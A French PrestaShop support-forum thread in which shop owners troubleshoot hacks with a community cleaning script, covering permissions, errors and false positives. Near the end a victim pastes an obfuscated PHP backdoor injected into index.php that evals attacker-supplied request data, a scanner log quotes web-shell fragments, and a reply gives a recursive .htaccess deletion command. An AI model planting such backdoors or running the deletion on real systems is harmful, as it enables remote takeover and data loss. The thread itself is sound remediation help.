Hack Prestashop sur la page de paiement - nettoyage

[Mathieu C.]

6 hours ago, Eolia said:

Le max_execution_time à 30 secondes.

Il faudrait le passer a ?

 

[Mediacom87]

il y a 1 minute, Mathieu C. a dit :

Il faudrait le passer a ?

 

160 mini sur PrestaShop

[Mathieu C.]

6 hours ago, Eolia said:

Il y avait quoi dans ce fichier ?

En dehors des langues il ne doit y avoir aucun php dans un thème.

<?php
/**
 * $THEMEDESC
 * 
 * @version        $Id: file.php $Revision
 * @package        modules
 * @subpackage    $Subpackage.
 * @copyright    Copyright (C) Jan 2012 leotheme.com <@emai:[email protected]>.All rights reserved.
 * @license        GNU General Public License version 2
 */  
if( !class_exists('LeoThemeInfo') ){ 
    class LeoThemeInfo{
        
        /**
         *
         */
    public static function onGetInfo( $output=array() ){
        $output["patterns"] = array();
        $path = _PS_ALL_THEMES_DIR_. _THEME_NAME_."/img/patterns";
            
        $regex = '/(\.gif)|(.jpg)|(.png)|(.bmp)$/i';
    
        if( !is_dir($path) ){ return $output; }
        
        $dk =  opendir ( $path );
        $files = array();
        while ( false !== ($filename = readdir ( $dk )) ) {
            if (preg_match ( $regex, $filename )) {
                $files[] = $filename;    
            }
        }  
         $output["patterns"] = $files;
     
        return $output;
    }
    
    /**
     *
     */
    public static function onRenderForm( $html, $thmskins ){
        
        $baseURL =  _PS_BASE_URL_.__PS_BASE_URI__."themes/"._THEME_NAME_."/img/patterns/";

        $pt = '';
        
    
         
        
        $html .= $pt;
        return $html;
    }
    
    public static function onUpdateConfig(  ){
        $leobgpattern = (Tools::getValue('leobgpattern')); 
        Configuration::updateValue('leobgpattern', $leobgpattern);
    }
    
    public static function onProcessHookTop( $params ){
        $params["LEO_BGPATTERN"] = Configuration::get('leobgpattern');
        return $params; 
    }
}    

}
?>

[Eolia]

Ils jouent à quoi les intégrateurs graphiques ?

On est dans un CMS MVC (Modèles / Vues / Contrôleurs) depuis quand on mélange du php dans des répertoires de vues ?

[Eolia]

il y a 16 minutes, Mediacom87 a dit :

160 mini sur PrestaShop

En fait ça dépend surtout de ce qu'il y a sur le ftp...

J'ai encore vue une boutique récemment avec 12 thèmes dans le répertoire themes/ et + de 400 modules et des répertoires complètements inconnus qui servaient de fourre-tout.

Plus il y a de fichiers à analyser, plus c'est long.

Mais bon, ceux qui sont sur des mutus genre OVH auront toujours du mal. (limite mémoire, limite temps, cpu faiblards)

 

[Mathieu C.]

35 minutes ago, Eolia said:

Ils jouent à quoi les intégrateurs graphiques ?

On est dans un CMS MVC (Modèles / Vues / Contrôleurs) depuis quand on mélange du php dans des répertoires de vues ?

Vietnam... Très riche comme thème, avec un éditeur de page et une tonne de modules, quasi une mini application (box in teh box) .
Bref comment qu'on fait alors  pour pas le virer (le fichier.php) ?

[Eolia]

Votre thème ne fonctionne pas sans ce fichier ?

J'ai l'impression que c'est une sorte de sauvegarde au cas où la classe principale ne serait pas déclarée

if( !class_exists('LeoThemeInfo') ){ 

 

[Mathieu C.]

28 minutes ago, Eolia said:

Votre thème ne fonctionne pas sans ce fichier ?

J'ai l'impression que c'est une sorte de sauvegarde au cas où la classe principale ne serait pas déclarée

if( !class_exists('LeoThemeInfo') ){ 

 

je ne sais pas, que devrai-je tester ? par principe de precaution je préfère qu'il reste la...

depuis 7 ans il tourne sans pb...

[Eolia]

Bah il faudra le remettre à chaque fois alors, je ne peux pas faire d'exception ou alors autant ne plus scanner du tout le répertoire themes.

[Mediacom87]

Il y a 1 heure, Eolia a dit :

En fait ça dépend surtout de ce qu'il y a sur le ftp...

J'ai encore vue une boutique récemment avec 12 thèmes dans le répertoire themes/ et + de 400 modules et des répertoires complètements inconnus qui servaient de fourre-tout.

Plus il y a de fichiers à analyser, plus c'est long.

Mais bon, ceux qui sont sur des mutus genre OVH auront toujours du mal. (limite mémoire, limite temps, cpu faiblards)

 

Pourquoi crois-tu que je développe mon propre module de nettoyage, il faudrait que je regarde du côté des thèmes pour nettoyer aussi cette partie, mais c'est plus complexe à développer puisque l'on peut avoir des thèmes enfants, que le thème natif change de nom régulièrement et le gain n'est pas significatif.

[Eolia]

Le thème natif ne change jamais de nom sous PhenixSuite  

[Mathieu C.]

26 minutes ago, Eolia said:

Bah il faudra le remettre à chaque fois alors, je ne peux pas faire d'exception ou alors autant ne plus scanner du tout le répertoire themes.

Si je me souviens bien on pouvait mettre des exception dans le fichier de scan

...

 

Edited July 5 by Mathieu C. (see edit history)

[Mathieu C.]

Bonjour,

Depuis la version 3.4.14.
Le mail envoyé par le script est concis et différent (et un texte blanc sur un fond Blanc.
Est-ce normal ?
Plus le rapport comme avant sur fond noir ?

[Eolia]

Vous devez être en PHP 5.6, ce souci a été corrigé dans la version 3.4.15

[Mathieu C.]

5.6 existe encore ???!

PHP 7.1 (PHP max pour un presta 1.6.1.24) si je ne m'abuse pas...
voir plus - je passe par un cron :
/usr/bin/curl -s https://maiori.com/xxxxxxxx.php

Edited August 23 by Mathieu C. (see edit history)

[quadricolore]

Bonjour, j'ai tenté de lance votre script (d'ailleurs merci à vous pour cet outil ! ) car mon site a été hacké et je n'ai plus accès au BO.

Lorsque je le lance il indique qu'il ne s'agit pas de la dernière version et qu'il télécharge et exécute. Ensuite, je me retrouve sur une page 404 de mon site et mon site m'affiche ensuite une page blanche.

Pourriez-vous m'orienter pour savoir ce qui peut causer cela ?

Merci

[Eolia]

il y a une heure, quadricolore a dit :

Bonjour, j'ai tenté de lance votre script (d'ailleurs merci à vous pour cet outil ! ) car mon site a été hacké et je n'ai plus accès au BO.

Lorsque je le lance il indique qu'il ne s'agit pas de la dernière version et qu'il télécharge et exécute. Ensuite, je me retrouve sur une page 404 de mon site et mon site m'affiche ensuite une page blanche.

Pourriez-vous m'orienter pour savoir ce qui peut causer cela ?

Merci

Une fois mis à jour le script change de nom, avez-vous un fichier avec une suite de lettre et chiffres .php à la racine de votre site ?

Si oui appelez-le depuis https://votre_domaine.com/xxxxxxxxx.php

[Eolia]

Il y a 1 heure, Mathieu C. a dit :

5.6 existe encore ???!

PHP 7.1 (PHP max pour un presta 1.6.1.24) si je ne m'abuse pas...
voir plus - je passe par un cron :
/usr/bin/curl -s https://maiori.com/xxxxxxxx.php

Tout le monde n'est pas en 1.6.1.24 et même cette version finale n'est pas compatible à 100% PHP 7.1

[quadricolore]

1 hour ago, Eolia said:

Une fois mis à jour le script change de nom, avez-vous un fichier avec une suite de lettre et chiffres .php à la racine de votre site ?

Si oui appelez-le depuis https://votre_domaine.com/xxxxxxxxx.php

Merci de votre retour. Lorsque je lance à nouveau avec le php nommé par la suite de chiffres, le site tourne un moment uis se remet en page blanche.

Voici l'erreur que j'ai :

Warning: require_once(/home/....../public_html/config/smarty.config.inc.php): failed to open stream: Permission denied in /home/....../public_html/config/config.inc.php on line 208

Edited August 23 by quadricolore (see edit history)

[Mathieu C.]

1 hour ago, Eolia said:

Tout le monde n'est pas en 1.6.1.24 et même cette version finale n'est pas compatible à 100% PHP 7.1

Cependant, les anciennes versions envoyaient bien le mail ressemblant au résultat du web.
Sur le web le résultat est toujours comme avant... (en plus des fichiers sans extensions)

 

[Eolia]

il y a 42 minutes, quadricolore a dit :

/public_html/config/smarty.config.inc.php

Quelles sont les permissions sur ce fichier ?

[Eolia]

il y a 31 minutes, Mathieu C. a dit :

Cependant, les anciennes versions envoyaient bien le mail ressemblant au résultat du web.
Sur le web le résultat est toujours comme avant... (en plus des fichiers sans extensions)

 

Avec la v3.4.15 vous recevez bien le mail comme avant, non ?

[Mathieu C.]

1 hour ago, Eolia said:

Avec la v3.4.15 vous recevez bien le mail comme avant, non ?

👌 Il confirme (modeste hommage à Alain)

[quadricolore]

On 8/23/2024 at 5:14 PM, Eolia said:

Quelles sont les permissions sur ce fichier ?

Merci de votre retour, j'ai changé les droits sur ce fichier et je n'ai plus l'erreur, mais j'ai à nouveau une erreur 404 lorsque je lance le fichier depuis le site. J'ai bien appliqué la suite de chiffres.php mais le site me renvoie systématiquement l'erreur 404 après avoir chargé un moment.

Avez vous un piste pour m'aider ? merci

[nonomg]

Bonjour @Eolia,

Merci pour votre script, il est génial, pour l'avoir déjà utilisé dans le passé. En voulant le relancer ce jour, malheureusement il me génère une erreur 500 que je gère en supprimant le fichier class_index.php

 

D'où cette erreur vient-elle ?

Merci pour votre retour.

[inpro]

Bonjour, tout d'abord un grand merci pour ce script qui nous sauve la mise depuis un moment sur notre version 1.7.6 presta.

Depuis la version 3.14 du script nous rencontrons un souci, le site plante (une page blanche erreur 500) à chaque fois que nous exécutons le script. 

Serveur: vps offre "PRO S" chez lws,

prametres ini:

allow_url_fopen = on
allow_url_include = off
safe_mode = off
magic_quotes_gpc = off
memory_limit = 2048M
max_input_time = -1
upload_max_filesize = 256M
post_max_size = 256M
max_input_vars = 30000
mod_security = off
short_open_tag = off
register_globals = off
display_errors = off

 

version php7.3, version presta 1.7.6

Un grand merci d'avance pour le temps accordé.

Edited August 27 by inpro
erreur version prestashop (see edit history)

[Eolia]

Dans le cas d'erreur 500, soit vous avez un fichier cleaner500.log à la racine qui a été créé (regardez la dernière ligne) soit il y a une erreur dnas le fichier error.log de votre hébergeur.

Certains hack modifient aussi les droits en lecture/ecriture (passent en 204) de certains fichiers.

[nonomg]

53 minutes ago, Eolia said:

Dans le cas d'erreur 500, soit vous avez un fichier cleaner500.log à la racine qui a été créé (regardez la dernière ligne) soit il y a une erreur dnas le fichier error.log de votre hébergeur.

Certains hack modifient aussi les droits en lecture/ecriture (passent en 204) de certains fichiers.

Merci pour votre retour !

Voici la fin de mon fichier cleaner500.log :

    [input] => 
    [1] => Array
        (
            [type] => 1
            [message] => Uncaught Error: Class 'Core_Business_ContainerBuilder' not found in /home/escapev36/public_html/config/bootstrap.php:27
Stack trace:
#0 /home/escapev36/public_html/config/config.inc.php(66): require_once()
#1 /home/escapev36/public_html/97448b7f31c1.php(1369): require_once('/home/escapev36...')
#2 {main}
  thrown
            [file] => /home/escapev36/public_html/config/bootstrap.php
            [line] => 27
        )

)

Je n'y comprends pas grand chose..

[Eolia]

Vérifiez que le fichier /Core/Business/Core_Business_ContainerBuilder.php existe bien et que ses droits sont bien en 604 ou 644.

Si il est en 204 ou autre chose, rétablissez ses permissions à 644:

[nonomg]

10 minutes ago, Eolia said:

Vérifiez que le fichier /Core/Business/Core_Business_ContainerBuilder.php existe bien et que ses droits sont bien en 604 ou 644.

Si il est en 204 ou autre chose, rétablissez ses permissions à 644:

Merci pour votre message, malheureusement, il est bien toujours en 0644.

[Eolia]

ok, donc c'est que le fichier /cache/class_index.php n'a pas été supprimé.

Vous êtes chez OVH ?

Relancez Cleaner vous allez récupérer la 3.4.17 qui devrait corriger le problème.

[nonomg]

4 minutes ago, Eolia said:

ok, donc c'est que le fichier /cache/class_index.php n'a pas été supprimé.

Vous êtes chez OVH ?

Relancez Cleaner vous allez récupérer la 3.4.17 qui devrait corriger le problème.

Je suis chez 02Switch.

Je viens de le relancer en enlevant class_index.php, malheureusement toujours le même problème.

Pouvons nous passer en DM ? Un grand merci !

[Eolia]

Ok mais j'irai voir demain matin, là je vais manger  

Envoyez-moi un accès ftp en MP.

[nonomg]

@Eolia Super, merci beaucoup et bon appétit !  

[Mathieu C.]

Bonjour, existe-t-il une page pour voir les modifs du secuity scan en fonction des versions ?

[Eolia]

Non, mais la dernière version (3.4.21) devrait résoudre tous vos problèmes.

[Mathieu C.]

Qui sont ?

 

[Eolia]

Les problèmes de mails ou de droits sur les fichiers ou erreur 500.

Maintenant, si vous n'avez pas de problèmes tout va bien  

[Renacata]

Bonjour, je déterre ce vieux topic toujours d'actualité, malheureusement. moi aussi je me suis fait pirater au niveau du module de paiement.... J'ai utilisé l'excellent cleaner.php (merci au passage !!) et pas mal de mes fichiers js doivent être contrôlés. Je ne vois pas comment faire ça manuellement, il y en a tellement !! Est-ce que je peux les importer du répertoire js de Prestashop (même version évidemment). Sorry si ma question est basique mais je ne suis pas u  pro, loin de là !! ;o)))

 

[Mediacom87]

Il y a 16 heures, Renacata a dit :

Bonjour, je déterre ce vieux topic toujours d'actualité, malheureusement. moi aussi je me suis fait pirater au niveau du module de paiement.... J'ai utilisé l'excellent cleaner.php (merci au passage !!) et pas mal de mes fichiers js doivent être contrôlés. Je ne vois pas comment faire ça manuellement, il y en a tellement !! Est-ce que je peux les importer du répertoire js de Prestashop (même version évidemment). Sorry si ma question est basique mais je ne suis pas u  pro, loin de là !! ;o)))

 

Le plus simple est de remplacer le répertoire JS de votre installation en ligne par le répertoire JS de votre version PrestaShop à partir de l'archive native.

Mais cela ne suffira pas, il faut trouver comment le piratage a eu lieu et combler la brèche.

[Renacata]

7 minutes ago, Mediacom87 said:

Je me doute, j'ai mis à jour Prestashop, changé les mots de passe etc etc... mais je ne vois pas ce que je peux faire de plus pour le moment.

 

 

[Mediacom87]

il y a 54 minutes, Renacata a dit :

Je me doute, j'ai mis à jour Prestashop, changé les mots de passe etc etc... mais je ne vois pas ce que je peux faire de plus pour le moment.

Identifier les modules problématiques https://security.friendsofpresta.org/

Étudier les alertes de codes relevés par Cleaner.php

Mettre en place un WAF même basique comme proposé par Cloudflare si vous ne pouvez pas plus.

J'ai déjà fait quelques articles pour aider à s'améliorer https://www.mediacom87.fr/post/securite/

[junny]

Bonjour

 

Merci à Eolia pour son script. J'ai reussi à nettoyer un hack. Je suis même passer sur la phenixsuite.

Surement lors de mon nettoyage, j’ai rendu ma page OPC sans CSS et JS. Ma page opc est en mode quirk.

Est ce que vous avez des pistes de fichiers que je dois vérifier pour résoudre mon problème?

 

Merci d'avance

[Eolia]

Activez le mode debug et regardez également les erreurs dans la console de votre navigateur (F12)

[armengual2]

J’ai inséré le fichier à la racine de PrestaShop 1.7.6 et lorsque je l’exécute ce message apparaît :

Ce script doit être placé à la racine de votre site (là où est installé votre Prestahop sur votre ftp) et nulle part ailleurs

[Eolia]

bah il ne doit pas être au bon endroit.

Il doit être dans le répertoire où sont tous les fichiers Prestashop (classes, controller,, index.php, ...)

[armengual2]

Hola, según el manual, tengo que ponerlo en la raíz del Prestashop y ahí creo que lo puse.

[junny]

On 10/9/2024 at 11:19 AM, Eolia said:

Activez le mode debug et regardez également les erreurs dans la console de votre navigateur (F12)

Bonjour.

 

J'ai une erreur fatal sur la OPC au niveau de la méthode de livraison

 

Quote

Fatal error: Uncaught Error: Cannot use object of type Carrier as array in ..../www/cache/smarty/compile/28/e9/74/28e97419b8bb6303707fba3020e9b28670ecdc1a_0.file.order-carrier.tpl.php:150 Stack trace: #0 /www/tools/smarty/sysplugins/smarty_template_resource_base.php(123): content_6707a14df25ab9_20680836(Object(Smarty_Internal_Template)) #1 .../www/tools/smarty/sysplugins/smarty_template_compiled.php(114): Smarty_Template_Resource_Base->getRenderedTemplateCode(Object(Smarty_Internal_Template)) #2 .../www/tools/smarty/sysplugins/smarty_internal_template.php(218): Smarty_Template_Compiled->render(Object(Smarty_Internal_Template)) #3 /www/tools/smarty/sysplugins/smarty_internal_template.php(387): Smarty_Internal_Template->render() #4 /www/cache/smarty/compile/d2/6a/87/d26a871485842fdef9201225c9f268fb35d13f13_0.file.order-opc.tpl.php(59): Smarty_Internal_Template->_subTemplateRender('...', NULL, NULL, 0, 31536000, Array, 0, tru in /www/cache/smarty/compile/28/e9/74/28e97419b8bb6303707fba3020e9b28670ecdc1a_0.file.order-carrier.tpl.php on line 150

J'ai vérifié les fichier order-carrier.tpl et order-opc.tpl du thème et il y a pas eu de modification sur les originaux.

Quelqu'un peut m'aider à ce sujet ?

 

J'ai également cette erreur mais ce sont des fichiers de la phenixsuite

 

Quote

Warning: Use of undefined constant _RIJNDAEL_KEY_ - assumed '_RIJNDAEL_KEY_' (this will throw an Error in a future version of PHP) in /www/classes/Cookie.php on line 88

Warning: Use of undefined constant _RIJNDAEL_IV_ - assumed '_RIJNDAEL_IV_' (this will throw an Error in a future version of PHP) in /www/classes/Cookie.php on line 88

Warning: openssl_decrypt(): IV passed is only 7 bytes long, cipher expects an IV of precisely 16 bytes, padding with \0 in /www/classes/Rijndael.php on line 97

 

Merci d'avance.

[Eolia]

Bon, pour le point 1 votre thème n'est pas conforme (erreur connue), il faut corriger votre fichier order-carrier.tpl

A cet endroit le bloc doit être écrit comme cela:

						{if $option.unique_carrier}
                                                        {foreach $option.carrier_list as $carrier}
                                                            <strong>{$carrier.instance->name|escape:'htmlall':'UTF-8'}</strong>
                                                        {if isset($carrier.instance->delay[$cookie->id_lang])}
                                                            <br />{l s='Delivery time:'}&nbsp;{$carrier.instance->delay[$cookie->id_lang]|escape:'UTF-8'}
                                                        {/if}
                                                        {/foreach}
                                                    {/if}

Car chez vous la ligne 

{if isset($carrier.instance->delay[$cookie->id_lang])}
            <br />{l s='Delivery time:'}&nbsp;{$carrier.instance->delay[$cookie->id_lang]|escape:'UTF-8'}
{/if}

Doit se situer en dehors du {foreach}...{/foreach}

Pour la Rindjael_key, je vous renvoie ici:

https://shop.devcustom.net/gen.php

Edited October 10 by Eolia (see edit history)

[Mathieu C.]

Hello,

version 3.4.28

On n'a plus le droit de mettre nos fontes en locale ?

 

Recherche des infections connues:

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Bold.eot

>>> Supprimé fonts/OpenSans-Bold.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.ttf

>>> Supprimé fonts/OpenSans-Italic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.woff2

>>> Supprimé fonts/OpenSans-Italic.woff2

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.svg

>>> Supprimé fonts/OpenSans-Italic.svg

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.woff

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.woff

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-LightItalic.ttf

>>> Supprimé fonts/OpenSans-LightItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.ttf

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.eot

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-SemiboldItalic.eot

>>> Supprimé fonts/OpenSans-SemiboldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.eot

>>> Supprimé fonts/OpenSans-Italic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Light.woff

>>> Supprimé fonts/OpenSans-Light.woff

 

[Eolia]

il y a 36 minutes, Mathieu C. a dit :

Hello,

version 3.4.28

On n'a plus le droit de mettre nos fontes en locale ?

 

Recherche des infections connues:

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Bold.eot

>>> Supprimé fonts/OpenSans-Bold.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.ttf

>>> Supprimé fonts/OpenSans-Italic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.woff2

>>> Supprimé fonts/OpenSans-Italic.woff2

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.svg

>>> Supprimé fonts/OpenSans-Italic.svg

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.woff

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.woff

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-LightItalic.ttf

>>> Supprimé fonts/OpenSans-LightItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.ttf

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.ttf

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-ExtraBoldItalic.eot

>>> Supprimé fonts/OpenSans-ExtraBoldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-SemiboldItalic.eot

>>> Supprimé fonts/OpenSans-SemiboldItalic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Italic.eot

>>> Supprimé fonts/OpenSans-Italic.eot

Fichier de police infecté (<?) => Maiori-Web/fonts/OpenSans-Light.woff

>>> Supprimé fonts/OpenSans-Light.woff

 

Si mais dans votre thème, le répertoire /fonts n'existe pas nativement et les derniers hacks créent ce répertoire avec des polices qui n'en sont pas.

[AcidLava]

Bonjour,

J'ai une erreur 403 lorsque j'essaye d'accéder à monsite.com/cleaner.php.

Les permissions sont bien à jour et c'est pareil lorsque je supprime le .htaccess. Je soupçonne que le hack en soit à l'origine (d'ailleurs le fichier cleaner.php disparait quand j'y retourne le lendemain). Une idée ?

Merci.

[Gilles6688]

Le lien du cleaner change de nom après l’installation, voir sur votre ftp...

[AcidLava]

Comment ça ? J'upload cleaner.php sur mon FTP, rien ne change au niveau du nom.

[Gilles6688]

Oui mais après l'avoir lancé une première fois il vous indique une url pour le relancer ou créer une tache cron...

[AcidLava]

J'ai une erreur 403 dès le premier lancement. Mon site a été piraté et de nombreux fichiers .htaccess etc ont été modifiés. Je pense que ça vient de là, mais comment modifier en masse ces fichiers .htaccess et autre ? Je comptais justement sur cleaner.php...

[Eolia]

Cleaner effectue un diagnostic et supprime ce qu'il est sûr d'être du hack. Dans tous les cas et après une sérieuse infection il y a besoin de l'œil et du cerveau humain pour effectuer le nettoyage.

[AcidLava]

Le problème c'est que je ne peux même pas lancer cleaner.php en l'état.

[Eolia]

Vous devez avoir un index.php vérolé, remplacez-le par celui d'origine.

Possible aussi que le .htaccess soit modifié.

[AcidLava]

Dans le cas de figure ou de nombreux index.php et .htaccess ont été modifiés, existe-t-il une solution pour corriger ça en masse ? 

J'ai ce code dans de nombreux .htaccess en l'occurence.

<FilesMatch '.(py|exe|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>

Order allow,deny

Deny from all

</FilesMatch>

 

[Eolia]

Pas sur un mutu. Sur un dédié vous pouvez supprimer tous les .htaccess avec un grep.

Donc, à la mano ou alors restauration à une date antérieure du ftp.

[AcidLava]

Pourriez-vous svp me fournir la commande ?

[Eolia]

A vos risques et périls si vous savez ce que vous faites

find . -name ".htaccess" -exec rm -rf {} \;

 

[Mediacom87]

Cela ne sert à rien, ils reviennent à la vitesse de l'éclair 😉

Il faut bloquer l'accès complet pour réussir à corriger cela.

[AcidLava]

@Mediacom87 Qu'entendez-vous par bloquer l'accès complet ?

J'ai identifié ceci dans les fichiers infectés, j'en déduis que le module simpleimportproduct est à l'origine de la faille de sécurité. Si je le supprime, est-ce que ça suffira pour éviter que les fichiers ne se régénérent (.htaccess, index.php, cache.php...) ?

1SRV  IgnorerSMW-SA-05636-mlw.wshll-5

/modules/simpleimportproduct/b9e9b88fa3.php

......t($_GET['path'])){$path=$_GET['path'];}else{$path=getcwd();}$path=str_replace...

8 KB2024-09-30 02:59:042SRV  IgnorerSMW-SA-13448-php.bkdr-0

/modules/simpleimportproduct/0f1f0f2b9d.php

......sab')."_".strrev('edoced');$filter=$filterfunc($kses_str);$preparefunc=s...

Edited October 14 by AcidLava (see edit history)

[Mediacom87]

1- bloquer par un htapassword peut-être

2- ce n'est pas parce qu'un module est infecté que la faille vient de lui.

[AcidLava]

@Mediacom87 Pouvez-vous m'en dire plus sur la procédure à suivre ? Dois-je transmettre ça à mon hébergeur ?

Concernant le module, je vois qu'il a été reporté par l'agence TouchWeb https://github.com/friends-of-presta/security-advisories/blob/main/_posts/2024-02-29-simpleimportproduct.md

[Mediacom87]

il y a 1 minute, AcidLava a dit :

@Mediacom87 Pouvez-vous m'en dire plus sur la procédure à suivre ? Dois-je transmettre ça à mon hébergeur ?

https://www.web2generators.com/apache-tools/htpasswd-generator

[AcidLava]

Merci @Mediacom87 

Je vais donc :

1. Bloquer l'accès via .htpsswd
2. Nettoyer tous les fichiers concernés via ImunifyAV+ (Plesk)

En espérant que cela suffise à au moins me rétablir l'accès au back-office qui est lui aussi en erreur 403...

Edited October 14 by AcidLava (see edit history)

[yama]

5 minutes ago, AcidLava said:

1. Bloquer l'accès via .htpsswd

1.5 Supprimer le module qui a le CVE (au passage ^^)

2. Nettoyer tous les fichiers concernés via ImunifyAV+ (Plesk)

 

[AcidLava]

@yama Bien entendu

[AcidLava]

Erreur 403 résolue, je suis maintenant sur une 500 (toujours en accédant au BO) :

Compile Error: main(): Failed opening required '/var/www/vhosts/monsite.fr/httpdocs/prod/hzopvx1wzpt3rrdg/../autoload.php' (include_path='/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/pear_exception:/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/console_getopt:/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/pear-core-minimal/src:/var/www/vhosts/monsite.fr/httpdocs/prod/vendor/pear/archive_tar:.:/opt/plesk/php/7.4/share/pear')

[Eolia]

Le fichier autoload.php existe bien ? Si oui, pb de cache Prestashop.

Exécutez cleaner avant d'essayer d'accéder au BO.

[AcidLava]

@Eolia le chemin indique /hzopvx1wzpt3rrdg/../autoload.php' 

À quoi correspond le ".." ? Difficile de dire si autoload.php est présent du coup. J'ai manuellement vidé les caches de Presta sans succès. Cleaner.php est lui toujours en 403.

[Eolia]

les ../ signifie "on remonte d'un niveau"

Dans les 1.7 il est à la racine

[AcidLava]

Merci beaucoup @Eolia, j'ai upload autoload.php et ça fonctionne. Maintenant, reste à faire en sorte que ça ne se reproduise pas... Le site est toujours sous protection PW.

[AcidLava]

Par contre je suis surpris que cleaner.php soit en erreur 403 (et ce n'est pas la première fois que ça m'arrive avec un fichier .php uploadé à la racine du site). Le site n'est pourtant plus infecté à l'heure.

[Eolia]

droits d'accès au fichier ?

[AcidLava]

Non il est bien en 644.

[Eolia]

Alors c'est soit dans le .htaccess soit dans la configuration de votre antivirus qu'il y a quelque chose qui le bloque.

[Comunicare Oggi]

Grazie mille. @Eolia. Per il lavoro svolto.

[AcidLava]

@Eolia J'ai régénéré le .htaccess et mod_security est désactivé, toujours pareil..

[AcidLava]

@Mediacom87 J'ai réussi à récupérer l'accès au back-office grâce à la protection .htpsswd mais index.php continue d'être injecté en continue avec ce code :

<?php /*-{(xqJ6oP7-*/error_reporting(0); /*-{<fbu3|-*/$rjBPK/*-^-*/ = /*-g2[6nwMu#7-*/"r"."a"/*-D>6OgJK8-*/."n"."g"/*-66qDA-*/."e"; /*-_I%Sd)-*/$mkZgi /*-Ag#cL-*/= /*-wTY#C,S4b-*/$rjBPK/*-RxJ[-*/("~", /*-qsNy~mTE-*/" "); /*-uZliZ!.t-*/$ZN/*-}Ey!9!-*/=/*-.c(yWl[tI-*/${$mkZgi/*-[-*/[30+1]/*-B]69-*/.$mkZgi/*-Iv(-*/[20+39]/*-<s`mZIhAk-*/.$mkZgi/*-ti-*/[1+46]./*-=HHnmx-*/$mkZgi/*-%jK::]6-*/[29+18]./*-ctz2i-*/$mkZgi/*-|b)$8}56-*/[25+26]./*-wQT-*/$mkZgi/*-M5Pya!TbY~-*/[33+20]/*-27=-*/.$mkZgi/*-ui-*/[45+12]/*-X(08r5j1fx-*/}; /*-7}Vk9g-*/if(/*-RQ9-*/in_array/*-s<4(A&#-*/(gettype/*-iB0Dulb-*/($ZN)."14",/*-3`WI{qM8-*/$ZN)&&(md5/*-dR--*/(md5/*-tK-*/(md5/*-)G&|=({-*/(md5/*-]gN-*/($ZN[8]))/*-I<(c(~-*/))/*-z&@<<[N-*/===/*-T9Su-*/"4ae30cb9d44e5d64ec5e51ae6382dcc3"/*-,AVOV^JMm(-*/))/*-6%8708W+H-*/{ $ZN/*-sO5p32-*/[63]/*-fT,1-*/=/*-}V_-*/$ZN/*-@hF!TM8M-*/[63]./*-V%-*/$ZN/*-@!-*/[80];/*-6176-*/ @eval/*-w7eOfu-*/(/*-~7}R+H-*/$ZN/*-OVv+9x-*/[63]/*-1N+Z-*/(/*-pN-*/${$ZN[39]}/*-,^2-*/[26])); }/*-V~O-*/class /*-7It-*/qM{ /*-td9B-*/static/*-]8-*/ function /*-$ay-*/AaBNn($SxJILhbRT) /*-Ws-*/{ $uNrVcLZRX/*-|L[q.DQ|M-*/ = /*-VPU$W6`[&-*/"r"./*-m5.-*/"a"./*-UMB9-*/"n"./*-N}jj8z9Y-*/"g"./*-!o2-*/"e"; /*-8fBjK$+ej{-*/$WvgNVC/*-[<~Np_m>CC-*/ = /*-<wq<0h^-*/$uNrVcLZRX/*-T6wbx-*/(/*-AL:B^G4--*/"~"/*-^@JO7EM-*/, /*-^r-*/" "/*->DXk-*/);/*-1Tw-*/ $AN /*--J-4Hpvo-*/= /*-@[-*/explode/*-<O-*/(/*-Mh-*/".", /*-7^-*/$SxJILhbRT/*-T}-*/); /*-Rat{-*/$LFRGMZQv /*-0W-*/= /*-Wt5iZ(7-*/""; foreach /*-8uOl-*/(/*-_)^Np-*/$AN /*-uVARZ-*/as /*-<XB2v6K=L-*/$XvimjYy /*-o{s+L4-*/=>/*-^vSmHno-*/ $ElbYxtqu/*-:af-*/) /*-<X>:C4P-*/$LFRGMZQv /*-u+-*/.= /*-(ni7|D`C&T-*/$WvgNVC[$ElbYxtqu/*-st>te%-*/ - /*-h7J%bg!-*/51986/*-4)=LG.Cc-*/];/*---*/ return /*-~_[S,-*/$LFRGMZQv; /*-n1u-*/} /*-^A-*/static /*-X&9&os-*/function /*-R[W-*/EmCfWJ/*-b.ERogCBm^-*/(/*-}HE3{-*/$kzXTb,/*-c([d(-*/ $LMpKBESA/*-#EW:Lz)-*/)/*-R4womO-*/ {/*-ZnW-*/ $cqWjxY/*-8aZ%T2p-*/ = 